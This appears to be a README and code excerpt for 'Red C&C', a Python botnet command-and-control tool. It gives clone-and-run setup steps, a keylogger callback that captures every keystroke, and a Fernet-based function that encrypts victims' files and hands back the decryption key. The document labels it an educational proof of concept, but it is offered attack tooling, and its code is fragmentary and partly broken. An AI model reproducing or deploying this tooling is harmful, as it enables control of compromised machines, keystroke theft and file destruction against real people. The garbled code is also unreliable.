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Red C&C is a program focused on commanding and controlling a botnet. Red C&C consists of two scripts: one that will be executed by the attacker and one that will be downloaded and executed on the target machines. Red C&C will allow an attacker to send terminal commands to an entire botnet through a single interface using a single command. The purpose of Red C&C is to simplify the communication between an attacker and the machines that they have compromised. Red C&C uses two of Python's built-in modules for most of the heavy lifting: the Socket module for establishing a client-server communication between the attacker and the target machines, and the Threading module for dividing the two main functions of the program into two seperate threads. Modifications to the Windows portion of the program are still being made.
Note: Red C&C was created as a PoC and should not be used for malicious intent but for educational purposes.
IP = "Your IP address"
# Install Git if its not installed.
apt install git
# Clone this repository to a folder of your choosing.
git clone https://github.com/binexisHATT/Red-C-C.git
# Change directory into the programs folder.
cd Red-C-C/
# Running the handler.
Or you can create a symbolic link:
path = The path to the folder you cloned Red C&C in.
ln path/Red-C-C/scripts/net/ss.py /bin/redcc
With this symbolic link, typing "redcc" will execute the handler anywhere in the command line.
# Running the handler with symbolic link.
def on_press(key):
global LOG
LOG += str(key.char)
except AttributeError:
if key == key.space:
LOG += ' '
elif key == key.enter: LOG += '\n'
elif key == key.backspace: LOG += ''
elif key == key.ctrl: LOG += ' ctrl+'
elif key == key.tab: LOG += '\t'
elif key == key.cmd: LOG += ' cmd+'
elif key == key.alt: LOG += ' alt+'
elif key == key.caps_lock: LOG += ' CapsLock '
elif key == key.delete: LOG += ' Del '
elif key == key.down: LOG += ' DownArrow '
elif key == key.left: LOG += ' LeftArrow '
elif key == key.up: LOG += ' UpArrow '
elif key == key.right: LOG += ' RightArrow'
elif key == key.esc: LOG += ' esc '
elif key == key.home: LOG += ' HomeKey '
elif key == key.insert: LOG += ' InsertKey '
elif key == key.print_screen: LOG += ' PrintScreen '
elif key == key.shift: LOG += ' shift+'
elif key == key.f1: LOG += ' F1 '
elif key == key.f2: LOG += ' F2 '
elif key == key.f3: LOG += ' F3 '
elif key == key.f4: LOG += ' F4 '
elif key == key.f5: LOG += ' F5 '
elif key == key.f6: LOG += ' F6 '
elif key == key.f7: LOG += ' F7 '
elif key == key.f8: LOG += ' F8 '
elif key == key.f9: LOG += ' F9 '
elif key == key.f10: LOG += ' F10 '
elif key == key.f11: LOG += ' F11 '
elif key == key.f12: LOG += ' F12 '
LOG += str(key)
def keylogger():
listener = keyboard.Listener(on_press=on_press)
if SYSTEM == 'Linux':
except OSError:
def crypto(action: str, *args):
if action == 'encrypt':
to_encrypt = args[0]
with open(to_encrypt, 'wb+') as f:
data = f.read()
key = Fernet.generate_key()
cipher = Fernet(key)
cipher_text = cipher.encrypt(data)
return f' Save the decryption key -> {key.decode()}'
to_encrypt, key = args[0][0], args[0][1]
with open(to_encrypt, 'wb+') as f:
cipher_text = f.read()
cipher = Fernet(key)
plain_text = cipher.decrypt(cipher_text)
except cryptography.fernet.InvalidToken:
return ' [-] Invalid key!'
return ' [+] File successfully decrypted!'